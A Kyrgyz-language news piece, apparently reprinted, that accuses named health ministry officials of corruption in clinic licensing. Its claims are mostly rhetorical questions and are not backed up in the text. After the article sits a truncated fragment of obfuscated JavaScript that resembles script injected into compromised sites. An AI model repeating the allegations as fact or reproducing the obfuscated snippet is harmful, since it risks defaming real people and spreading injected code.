Menu

Талантбек Батыралиевдин дагы бир “табакташы” Горинби?

Бөлүшүү:

Саламаттыкты сактоо министри Талантбек Батыралиевдин былыгын, ишиндеги чабал жүруштөрүн жазбаган ММК калбады. Бул ойрон канчалык ачуу сындарды укпасын, бети чымырабай, тоготпой отурганы неси? Парламент менен өкмөт президенттик аппараттан жалтактап, анын кызматтык ордун кароого диттери барбай, коркуп отурушкандары кандай?

Ушул күндөрү саламаттыкты сактоо системасын жалгыз министр Батыралиев эле талкалабай, орун басары Олег Горин да «жардамга» келип, тармактын тамтыгын чыгарып жаткандыгын мекеменин ичиндеги профессионал адистер кеп кылышууда. Көрсө, бу Олег Горин кол алдындагы кызматынан пайдаланып, жеке менчик клиникаларга тиешелүү медициналык нормаларга туура келбегенине карабай лицензия бергени ашкереленеби? Баарынан кызыгы, баш калаадагы ЖЧК «Жисян», ЖЧК «Эльба», ЖИ «Тен» аттуу чет элдик жеке менчик клиникалардын кеңсе, имараттары санитардык-эпидемиологиялык нормаларга тап-такыр туура келбегенине карабай, мыйзамды уруп ойнобостон өйдө жактан министр орун басары Олег Гориндин «батасын алып» иш жүргүзүп жаткандары жалганбы?

Эгерде адилеттүүлүк болуп, биздин тиешелүү күч органдары жогорудагы чет элдик жеке менчик клиникаларга лицензиялар кандай «сыйкырдуу жолдор» менен берилип кеткенине кызыгышса, орун басар Олегди түп-түз эле түрмөгө алып барышабы? УКМК алдындагы АКС башчысы Улан Исраилов медицина системасындагы министр Талант Батыралиев менен орун басары Олег Гориндин артын «челдирип» көрсө, коомчулукка далай коррупциялык иштер ашкереленет беле? Батыралиев менен Олег Горинди экөөнү тең саламаттыкты сактоо системасынан тап-такыр кууп чыгып, жоопкерчиликке тартпаса, медицина тармагы тынчыбай калды көрүнөт. Өткөн жылы премьер Сариев дал ушул Олег Горинге ишиндеги чабал жүрүшү үчүн катуу сөгүш бергенине карабай, иштеп жаткандыгы таңгалдырууда. Ушундай кадрлардын айынан бийликке качанкыга чейин көө сүртүлүшү   керек?

Булак: “Азияньюс”

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[Ss]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "kyrgyztoday.kg"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

Эгер бул тексттен ката таап калсаңыз, ошол ката сөздү белгилеп, Ctrl+Enter кнопкаларын чоогу басуу менен билдирип коюңуз.

КОММЕНТАРИЙ КАЛТЫРУУ

Төмөндө көрсөтүлгөн уячаларга керектүү маалыматтарды туура киргизгениңизди текшериңиз.HTML-код киргизүүгө уруксат жок.

Captcha 2 + 1 =

ОКШОШ МАКАЛАЛАР

Меню

Орфографиялык ката тууралуу Отчет

Редакцияга төмөнкү текст жөнөтүлөт: